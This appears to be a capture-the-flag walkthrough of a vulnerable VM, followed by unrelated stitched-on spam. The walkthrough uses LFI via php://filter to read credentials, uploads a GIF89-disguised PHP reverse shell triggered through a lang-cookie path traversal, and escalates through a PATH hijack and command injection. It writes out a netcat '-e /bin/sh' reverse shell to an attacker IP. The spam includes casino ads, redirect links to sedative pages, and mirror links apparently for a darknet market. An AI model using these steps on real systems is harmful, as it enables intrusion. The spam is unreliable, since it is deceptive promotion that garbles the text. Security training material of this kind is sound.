We’ll start with a basic nMap scan, just with -sV

Looks like we got a webserver running MySql. Let’s run nikto on it and see if we can get any additional information:

Let’s also navigate to the website and see what “normal” looks like. We’ll bring up Firefox, and then click on the Login button.
When we look at the address bar, we see that this resembles a URL that could be vulnerable to local file inclusion.

I tried some basic LFI commands here and didn’t have any luck. I also tried navigating to config.php with no luck.

To get what we need, we need to dig a little further into how the website works. For this, I’m going to use HackBar to help out a little bit. It’s $9.00 for a year license, but totally worth it. We’ll break this down step by step on how to use HackBar to get what we need, and then we’ll show a manual way to do it without HackBar.
We’ll navigate to the website, and then click on the Load URL (red boxes) and then we should see the URL in the HackBar window (green box).

Next, click on LFI, Using wrappers, php://filter, ?page=php://filter/convert.base64-encode/resource=index.php

Next, click on the Execute button.
You’ll notice that nothing comes up, so let’s remove the .php from the end of the index link and then click Execute again.

In our results, we see some data encoded in the window.

Copy this data, then click on Encoding, Base64Decode and then paste the data and click Ok. You’ll see the unencoded website in HackBar. Feel free to copy/paste this info into a program like Nano if it’ll make your life easier to view.
The Index page doesn’t seem to have too much info, so let’s use the same method for the Login and Upload webpages
If we look at the Login page, we see a reference to config.php and we’ll check out this file in a minute.

Additionally, on further inspection of the index file, we see a reference to a cookie that isn’t properly implemented: lang.

What we’re looking at here is some pieces of info that are commented out with // but the if statement for the cookie is still in place. We also see that there’s not sanitation on the input to prevent characters that could be used in things like local file inclusion (../ or stuff like that). This will come in handy later.
Now, let’s look at the Upload page, we see some of the required file types: jpg, jpeg, gif, png

Let’s see what we can find out about the config page. After analysis, it looks like there’s some credentials flat out in it:

Using CURL instead of HackBar
We can use curl and the command line instead of HackBar to get the same information we need to. For example, to view the contents of the config file: curl http://192.168.41.240/?page=php://filter/convert.base64-encode/resource=config
More information can be found here: https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/ and https://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/
When we run the curl command, the part in the red box is what we’re interested in, but we need to decode it.

So let’s copy it, and then echo it and use | base64 -d to decode it.

And now we have some credentials.
SQL Login
Let’s try logging into the SQL instance with the following command: mysql -u root -p -h 192.168.41.240

Now, let’s run a few commands to see what we can find out:
- show databases;
- use Users;
- show tables;
- select * from users;

They too look to be base64 encoded, so let’s decode these three user’s passwords:

I navigated back to the website and logged in as the user kent.
Logged in as Kent we see a standard file upload page.

Exploitation
Now that we’re at an upload page, let’s see if we can get a reverse shell on it. We’ll use the PHP reverse shell from PenTest monkey, and be sure to modify it with your attacking machine’s IP address.
First, I renamed it to shell.gif and tried uploading it and got the following error:

Backtracking, I looked at the code for the upload webpage again and saw this:

This is the if statement that will return Error 002 if something doesn’t match up: in this case, the image extension (jpeg, gif, png) and the mime information.
What this is is an extra piece of security implemented in an attempt to verify the the file being uploaded is a picture and not just a file with the extension renamed to something like .gif. Here’s how it works:
If you open a valid .gif in something like Notepad you’ll notice a few characters right away: GIF89

This is in reference to the latest release of the .gif format as referenced here: https://en.wikipedia.org/wiki/GIF Thus, we need to add GIF89 to our php reverse shell file and re-upload it, and cross our fingers.

After uploading, we don’t get an error, but we don’t see much either:

That’s ok, now we just have to figure out where the file uploaded to so we can execute it. To do this, we can right click on that icon and select Inspect Element.

It looks like it was placed in the upload folder and then given a hash. So let’s copy that link and navigate to it.

Let’s see if we can use that lang cookie vulnerability. There’s several ways to do this, include using Burp Suite and TamperData. I’ll explain both.
Tamper Data
You can get the Tamper Data extension for Firefox which will allow you to do some cookie manipulation (among other things). To do this, be sure you’re on the upload page and then start Tamper Data.

Leave the default settings and scroll down and click Yes when prompted to start Tamper Data.

Now, refresh the upload page and click on Ok on the box that pops up.

You can see within this window the PHPSESSID cookie. We’re going to replace that with the lang one.

First, let’s test it though. Modify the Cookie to lang=../../../../../../etc/passwd

Click the Ok button at the bottom of the window and seen what it returns:

So now we know for sure this is vulnerable, so let’s see if we can update the language cookie to execute our reverse shell. Before you do this, start up a netcat listener.
Next, we update our lang cookie to the path of the file you uploaded earlier, but be sure to add ../ in front of it:

Once you click OK, check your shell window.

Priv Esc
Now that we’re on, we need to see what kind of enviroment we’re dealing with. We can start by typing a few basic commands:
- ps -p $$ – Allows us to see what type of shell we have
- python –version – Is python installed, and if so what version?
- nc -Will tell us if NetCat is installed

So it looks like we have a pretty basic shell, but python and netcat are both installed.
We can use Python to upgrade our dumb shell by using the command python -c ‘import pty; pty.spawn(“/bin/bash”)’ as described here: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Now, if we type ps -p $$ again we can see that we now have a full bash shell.

Now we can use some elevated commands such as logging in as another user. Let’s continue to pick on kent by logging on as him:

I navigated to Kent’s home directory and didn’t see anything interesting, so then I logged in as Kane and upon inspecting his home directory saw a program called msgmike

When we try to run the msgmike program we see that it tries to execute the cat command on a .txt file that isn’t where it’s expected to be.

This tells us a couple of things. Mike might be a person of interest if he’s “important” enough to have a script running with his permissions. Also, we can probably manipulate the cat command to execute commands as this user, Mike.
What we can do here is tell Linux to look for the cat command in another place and then have the cat command execute something that we want it to do. To do that, we need to see what the PATH currently is with the command echo $PATH

PATH is where Linux looks for binaries (programs like cat) and as soon as it finds that program in one of the locations specified in PATH it executes it. So let’s change the PATH variable to our current location with the following command: export PATH=. and then we confirm it.

Now, we have to create a “new” binary, called cat, that then executes what we want it to do. Let’s have it create a shell, and then give it permissions to execute.

Now, when we run ./msgmike we have a shell with the permissions of Mike.

When we try to run a command like whoami it won’t work because of how we previously modified the PATH, so let’s change it back: export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Now, we can navigate to mike’s home directory, and we notice a file called msg2root which is also ruining as SUID, but this time as root.

When we run msg2root it looks like it just echos out the command that we specify.

We’ll remember from earlier that NetCat is installed on this box, so we can run NetCat as root and setup a reverse shell running as root. So let’s setup a NetCat reverse listener on our Kali box in another window with the command nc -lvp 8000
Now, on our target machine, we’ll execute ./msg2root and then the following command test; /bin/nc -nv 192.168.41.239 8000 -e /bin/sh (Note: we need the test; to have it echo the first command, but then execute the rest of the command after the semi-colon.
Note: You can also do this without the 2nd netcat listener by doing the following:
- Run ./msg2root
- Type test; /bin/sh

На данном сайте можно ознакомиться с информацией о сериале “Однажды в сказке”, развитии событий и главных персонажах. https://odnazhdy-v-skazke-online.ru/ Здесь размещены подробные материалы о создании шоу, исполнителях ролей и фактах из-за кулис.
Программа наблюдения за объектами – это актуальное решение для обеспечения безопасности , сочетающий инновации и простоту управления.
На сайте вы найдете детальные инструкции по настройке и установке систем видеонаблюдения, включая онлайн-хранилища, их сильные и слабые стороны.
Vista CCTV Software
Рассматриваются гибридные модели , сочетающие облачное и локальное хранилище , что делает систему более гибкой и надежной .
Важной частью является разбор ключевых интеллектуальных возможностей, таких как определение активности, распознавание объектов и дополнительные алгоритмы искусственного интеллекта.
I was recommended this website by my cousin. I am not sure whether this post is written by him as no one else know such detailed about my difficulty. You are wonderful! Thanks!
Здесь вы найдете клинику ментального здоровья, которая обеспечивает профессиональную помощь для людей, страдающих от тревоги и других психологических расстройств. Наша эффективные методы для восстановления ментального здоровья. Наши опытные психологи готовы помочь вам справиться с проблемы и вернуться к гармонии. Опыт наших врачей подтверждена множеством положительных отзывов. Свяжитесь с нами уже сегодня, чтобы начать путь к лучшей жизни.
http://jdwdesigns.us/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fk%2Fkorvalol%2F
На этом ресурсе вы найдете клинику ментального здоровья, которая обеспечивает профессиональную помощь для людей, страдающих от стресса и других ментальных расстройств. Мы предлагаем эффективные методы для восстановления психического здоровья. Наши специалисты готовы помочь вам преодолеть психологические барьеры и вернуться к гармонии. Профессионализм наших психологов подтверждена множеством положительных обратной связи. Свяжитесь с нами уже сегодня, чтобы начать путь к оздоровлению.
http://lfgautomation.com/__media__/js/netsoltrademark.php?d=empathycenter.ru%2Fpreparations%2Fz%2Fzopiklon%2F
Stake Casino gameathlon.gr is among the best cryptocurrency casinos since it integrated crypto into its transactions early on.
The online casino market has expanded significantly and the choices for players are abundant, but not all casinos provide the same quality of service.
In this article, we will take a look at top-rated casinos you can find in the Greek region and the benefits they offer who live in Greece specifically.
The top-rated casinos of 2023 are shown in the table below. Here are the best casino websites as rated by our expert team.
For every casino, make sure to check the validity of its license, security certificates, and data protection measures to ensure safety for all users on their websites.
If any of these elements are missing, or if it’s hard to verify them, we exclude that website from our list.
Casino software developers are crucial in selecting an online casino. Generally, if there’s no valid license, you won’t find reliable providers like Play’n Go represented on the site.
Top-rated online casinos offer known payment methods like bank cards, but should also provide electronic payment methods like PayPal and many others.
Stake Online Casino gameathlon.gr is considered one of the top online gambling platforms since it was one of the first.
The online casino market has expanded significantly and there are many options, however, not all of them offer the same experience.
In this article, we will take a look at top-rated casinos available in Greece and the benefits they offer who live in Greece specifically.
Best online casinos of 2023 are shown in the table below. Here are the highest-rated casinos as rated by our expert team.
For every casino, make sure to check the legal certification, security certificates, and data protection measures to confirm security for players on their websites.
If any of these factors are absent, or if we can’t confirm any of these elements, we exclude that website from our list.
Gaming providers also play a major role in selecting an online casino. As a rule, if the previous factor is missing, you won’t find trustworthy software developers like Microgaming represented on the site.
Top-rated online casinos offer known payment methods like bank cards, but they should also include e-wallets like Paysafecard and many others.
I am always thought about this, thankyou for posting.
Swiss watches have long been synonymous with precision. Meticulously designed by renowned brands, they combine heritage with cutting-edge engineering.
Every component embody superior attention to detail, from intricate mechanisms to luxurious finishes.
Owning a timepiece is more than a way to check the hour. It represents sophisticated style and exceptional durability.
No matter if you love a classic design, Swiss watches deliver unparalleled reliability that never goes out of style.
http://forum.lbaci.net/viewtopic.php?t=142062
Even with the rise of digital timepieces, mechanical watches are still iconic.
Collectors and watch lovers admire the craftsmanship that defines traditional timepieces.
Compared to digital alternatives, that become outdated, classic timepieces stay relevant for decades.
http://forum.spolokmedikovke.sk/viewtopic.php?f=3&t=150789&p=1000067#p1000067
Luxury brands still produce exclusive traditional watches, confirming that their appeal remains strong.
For many, a mechanical watch is not just a way to tell time, but a reflection of craftsmanship.
Even as high-tech wearables come with modern tech, mechanical watches represent an art form that remains unmatched.
Фанаты слотов всегда могут найти рабочее обходную ссылку казино Чемпион чтобы без проблем запустить любым игровым ассортиментом.
В казино представлены самые топовые слоты, включая классические, и последние игры от ведущих производителей.
Если официальный сайт не работает, зеркало казино Чемпион позволит без проблем войти и делать ставки без перебоев.
https://casino-champions-slots.ru
Все возможности сохраняются, включая открытие профиля, депозиты и вывод выигрышей, и, конечно, бонусную систему.
Заходите через актуальную альтернативный адрес, чтобы играть без ограничений!
Чем интересен BlackSprut?
BlackSprut вызывает обсуждения разных сообществ. В чем его особенности?
Данный ресурс предоставляет разнообразные опции для тех, кто им интересуется. Оформление платформы отличается простотой, что позволяет ей быть доступной даже для тех, кто впервые сталкивается с подобными сервисами.
Важно отметить, что BlackSprut работает по своим принципам, которые делают его особенным в своей нише.
При рассмотрении BlackSprut важно учитывать, что различные сообщества имеют разные мнения о нем. Одни подчеркивают его функциональность, другие же рассматривают более критично.
В целом, эта платформа продолжает быть объектом интереса и удерживает заинтересованность разных пользователей.
Ищете актуальное зеркало БлэкСпрут?
Если нужен обновленный сайт BlackSprut, вы на верном пути.
https://bs2best
Сайт часто обновляет адреса, и лучше знать актуальный домен.
Мы мониторим за актуальными доменами и готовы предоставить актуальным зеркалом.
Проверьте актуальную версию сайта прямо сейчас!